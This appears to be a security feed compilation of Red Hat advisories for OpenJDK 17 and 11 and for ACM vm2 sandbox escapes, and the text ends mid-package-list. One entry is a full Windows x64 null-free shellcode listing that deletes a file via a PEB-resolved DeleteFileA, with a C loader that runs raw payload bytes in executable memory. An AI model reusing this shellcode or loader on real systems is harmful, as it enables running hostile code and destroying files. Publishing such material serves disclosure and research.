Red Hat Security Advisory 2023-1898-01 - The java-17-openjdk packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-17-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:1898-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1898  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-17-openjdk is now available for Red Hat Enterprise Linux  
8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-17-openjdk packages provide the OpenJDK 17 Java Runtime  
Environment and the OpenJDK 17 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* In FIPS mode, the list of cryptographic services and algorithms available  
is limited to those that are FIPS compliant. It was found that this  
filtering was too strict and was also excluding service attributes. These  
attributes are now made available in FIPS mode, as they are in non-FIPS  
mode. (RHBZ#2186835)

* Previously, the XML signature provider was unable to operate in FIPS  
mode. Following recent enhancements to FIPS mode support, the XML signature  
provider can now be supported. It is now enabled in FIPS mode.  
(RHBZ#2186827)

* The PKCS#11 provider used by FIPS mode can be supported by different  
PKCS#11 tokens. It was found that some PKCS#11 tokens may not be  
initialised fully before use, leading to an exception being thrown by the  
provider. With this release, this exception is now expected and handled by  
the FIPS support code. (RHBZ#2186831)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2186827 - Enable XML Signature provider in FIPS mode [rhel-8, openjdk-17] [rhel-8.7.0.z]  
2186831 - C_GetInfo can throw an exception if called before initialization in some PKCS #11 tokens [rhel-8, openjdk-17] [rhel-8.7.0.z]  
2186835 - Add missing attributes when registering services in FIPS mode [rhel-8, openjdk-17] [rhel-8.7.0.z]  
2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
java-17-openjdk-17.0.7.0.7-1.el8_7.src.rpm

aarch64:  
java-17-openjdk-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_7.aarch64.rpm

ppc64le:  
java-17-openjdk-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_7.ppc64le.rpm

s390x:  
java-17-openjdk-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_7.s390x.rpm

x86_64:  
java-17-openjdk-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-demo-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-devel-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-headless-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-javadoc-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-javadoc-zip-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-jmods-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-src-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-static-libs-17.0.7.0.7-1.el8_7.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el8_7.aarch64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_7.aarch64.rpm

ppc64le:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el8_7.ppc64le.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_7.ppc64le.rpm

s390x:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_7.s390x.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_7.s390x.rpm

x86_64:  
java-17-openjdk-debuginfo-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-debugsource-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-demo-fastdebug-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-demo-slowdebug-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-devel-fastdebug-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-devel-slowdebug-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-fastdebug-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-headless-fastdebug-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-headless-slowdebug-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-slowdebug-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-src-fastdebug-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-src-slowdebug-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.7.0.7-1.el8_7.x86_64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.7.0.7-1.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsKNzjgjWX9erEAQjJrg//XX+Ggn+OhYJLGr7HCfOZJQBJvs/qw8D/  
hueTThhEABNaWYB4w+xIkRCqQVLc4F8UxpDBfXWQCGtftWaLEMdoVFdWNwl416l2  
Hc6M7XXX/YSh+NQd2Elntq6RiaQDDXvLpTrNxAxIKquJf8NPTLMBbfcMLIfOmTfM  
cM9dPaCnLH9hRhftzbLJJeytDbKZafGZq08dPZzjHDNbF9oTYYlAhu4eJnFAs9/O  
MBaUgoSbXFvvLhIuGML7H29l21KVyGITYuA2cmKjCh9O5hC1amIfUi1i+sgLmRp+  
Zl8Lq9LEBBUnK38szH12r5ayVsPrEozU2sgdWgS9nt8cGp6HyEMiwMFqfulrmHWr  
/uVhiR6jBoh3RUFz1ieqVIirIhXILQXQegVCJE2MFSMsOQJofSkmRycmUDvciQNs  
RhNZ6GS6TGfUuqf0094myvUdLpwggdgrdfmkV+We48pBYQmuzNTkno8uYr1/4Vne  
jOF1nmF7Ar4PiJhaRIgHBssrj4dDXbP2gmxfr6Q2XAW+wAbUVoSwATvRgaaiaPDD  
IuIQ68VDi5VWeAmFbOzHmXiOTD8K0PH4r8/g9F983hWa5ZLy8hqubjDClkTnYecH  
21BdUbSsoQggdUUYZvbf4xFGaPsaB0luQauyug1vavKmRLQqBmfTs4I1+B5lEjYR  
cDCoTaewqog=  
=NIVN  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1898-01

This Windows/x64 shellcode is an implementation of the DeleteFileA Windows API to delete a file in the C:/Windows/Temp/ directory.

    ; Name: Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode; Author: Nayani; Date: 22/04/2023; Tested on: Microsoft Windows [Version  10.0.22621 Build 22621]; Description: ; This an implementation of DeleteFileA Windows api to delete a file in the C:/Windows/Temp/ directory. ; To test this code create a file: ; echo "test" >> C:/Windows/Temp/test.txt ; and then execute the shellcode ; This code uses PEB to resolve kernel32 and find the DeleteFileA function. sub rsp, 28hand rsp, 0fffffffffffffff0hxor rdi, rdi            mul rdi                 mov r9, gs:[rax+0x60]  mov r9, [r9+0x18]     mov r9, [r9+0x20]     mov r9, [r9]          mov r9, [r9]          mov r9, [r9+0x20]     mov r8, r9             ; Get kernel32.dll ExportTable Addressmov r9d, [r9+0x3C]     add r9, r8             xor rcx, rcx            add cx, 0x88ffshr rcx, 0x8            mov edx, [r9+rcx]      add rdx, r8             ; Get &AddressTable from Kernel32.dll ExportTablexor r10, r10mov r10d, [rdx+0x1C]    add r10, r8             ; Get &NamePointerTable from Kernel32.dll ExportTablexor r11, r11mov r11d, [rdx+0x20]    add r11, r8             ; Get &OrdinalTable from Kernel32.dll ExportTablexor r12, r12mov r12d, [rdx+0x24]    add r12, r8             jmp short name_apigetaddr:pop r9                pop rcx                 xor rax, rax            mov rdx, rsp             push rcx                check_loop:mov rcx, [rsp]          xor rdi,rdi             mov edi, [r11+rax*4]    add rdi, r8             mov rsi, rdx            repe cmpsb              je resolver           incloop:inc raxjmp short check_loopresolver:pop rcx                 mov ax, [r12+rax*2]    mov eax, [r10+rax*4]   add rax, r8            push r9               ret                    name_api:                   ; DeleteFileAxor rcx, rcxadd cl, 0xC                 mov rax, 0x41656CFFFFFFFFFF    ;leAshr rax, 40push raxmov rax, 0x69466574656C6544    ;DeleteFipush raxpush rcx                    call getaddr             mov r14, rax                ; Bool DeleteFileA(;   LPCSTR lpFileName; );xor rcx, rcxmul rcx                     push rax                    mov rax, 0x7478742E74736574push raxmov rax, 0x2F706D65542F7377 ; ws/temp push raxmov rax, 0x6F646E69572F3A43 ; c:/Windopush rax                    ; RSP = "test.txt"mov rcx, rsp                ; RCX = "test.txt"sub rsp, 0x20               call r14                    ;Delete File in C:/Windows/Temp/test.txt add rsp, 0x20[!]===================================== POC ========================================= [!]#include <windows.h>void main() {  void* exec;  BOOL rv;  HANDLE th;  DWORD oldprotect = 0;      unsigned char payload[] = "\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xff\x48\xf7\xe7\x65\x4c\x8b\x48\x60\x4d\x8b\x49\x18\x4d\x8b\x49\x20\x4d\x8b\x09\x4d\x8b\x09\x4d\x8b\x49\x20\x4d\x89\xc8\x45\x8b\x49\x3c\x4d\x01\xc1\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x41\x8b\x14\x09\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x34\x41\x59\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04\x82\x4c\x01\xc0\x41\x51\xc3\x48\x31\xc9\x80\xc1\x0c\x48\xb8\xff\xff\xff\xff\xff\x6c\x65\x41\x48\xc1\xe8\x28\x50\x48\xb8\x44\x65\x6c\x65\x74\x65\x46\x69\x50\x51\xe8\xa6\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x74\x65\x73\x74\x2e\x74\x78\x74\x50\x48\xb8\x77\x73\x2f\x54\x65\x6d\x70\x2f\x50\x48\xb8\x43\x3a\x2f\x57\x69\x6e\x64\x6f\x50\x48\x89\xe1\x48\x83\xec\x20\x41\xff\xd6\x48\x83\xc4\x20";          unsigned int payload_len = 500;  exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);  RtlMoveMemory(exec, payload, payload_len);  rv = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect);  th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);  WaitForSingleObject(th, -1);}

Windows/x64 Delete File / Dynamic PEB Method NULL-Free Shellcode

Red Hat Security Advisory 2023-1896-01 - Red Hat Advanced Cluster Management for Kubernetes hotfix security update for console. Red Hat Product Security has rated this update as having a security impact of Critical.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Critical: Red Hat Advanced Cluster Management 2.5 hotfix security update for console  
Advisory ID:       RHSA-2023:1896-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1896  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-29017 CVE-2023-29199 CVE-2023-30547   
=====================================================================

1. Summary:

Red Hat Advanced Cluster Management for Kubernetes hotfix security update  
for console

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Security Fix(es)

* CVE-2023-29017 vm2: Sandbox Escape  
* CVE-2023-29199 vm2: Sandbox Escape  
* CVE-2023-30547 vm2: Sandbox Escape when exception sanitation

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied, and that you are running Red Hat  
Advanced Cluster Management for Kubernetes version 2.5.7.

See https://access.redhat.com/solutions/7007647 for instructions on how to  
apply this hotfix, as well as for information about when the hotfix has  
been  
superseded by a permanent fix and should be removed.

Important: This hotfix is a temporary fix that will be supported until 30  
days after the date when the next patch release of the product is released.  
After the 30-day period ends, you must either update to the latest patch  
release and remove this hotfix to continue receiving security updates and  
maintain support or upgrade to a newer feature release of the product.

4. Bugs fixed (https://bugzilla.redhat.com/):

2185374 - CVE-2023-29017 vm2: sandbox escape  
2187409 - CVE-2023-29199 vm2: Sandbox Escape  
2187608 - CVE-2023-30547 vm2: Sandbox Escape when exception sanitization

5. References:

https://access.redhat.com/security/cve/CVE-2023-29017  
https://access.redhat.com/security/cve/CVE-2023-29199  
https://access.redhat.com/security/cve/CVE-2023-30547  
https://access.redhat.com/security/updates/classification/#critical

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsGNzjgjWX9erEAQiOlw/+JnvBKFVSVIarm06Urw3hlrrdWQBVKNAt  
ZgAEUGf9humryld0WwK7dHf3KJSMrOO4ZE/PxfYCmIXs6X3s9fy/HbMj+6a7lqEm  
s0uKba09YJ7NZHkk1g+ezOGaJboN1MSfNpvBejLAWulEbtDJ0XZDdrS1T6itOlvZ  
sPNUXhopV5UbGWVayW+XK4hQU/UeXgXzaxc+hUZXX73nsSrFNqFNHWsIu0MQUo3P  
trGf9H5k1ic/g/X/QCmr4LFFb6m9VnQ2MTNBwKwL/7VdgRxLkLToblvj7j04pQtQ  
GXLIcINhLn5hzecZ2PPTIYD6GTTlYlFnweMaW/6t+GAdP7J1jL9jYV0dbLvBSwhb  
XTcqvS3f/iFo2M2PEFdfpkk3JVS1U7Htl+DC8j0fia1jdUpMesPpSLDe9DIH0Xc/  
uFEh8fiV7oJZKsJHzYdoMYmwr8RIV/yjWzBs46/yfapsFuQc8HGZW6+MU96JKU5k  
JDWu70/zAQbeQcp2ReoRf8aZ2nTrbzUXYiw4gcsXXLSmBRsv9gEMStI7Efrn6jN3  
XAP0LLYL8wW8KGfkbM2+s7YrzU/tNoIG7l2xOhzCg9kuv28mym3kBDaeXDHgn0LF  
95NIkZE0GkZ8sm3qvKT8a6aMIyw4paZBh0A4zhOI2t5psHQqogCXv/tpN18qREed  
4yVg+oEQ1Hk=  
=MJHf  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1896-01

Red Hat Security Advisory 2023-1892-01 - The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-11-openjdk security update  
Advisory ID:       RHSA-2023:1892-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1892  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-11-openjdk is now available for Red Hat Enterprise Linux  
8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime  
Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
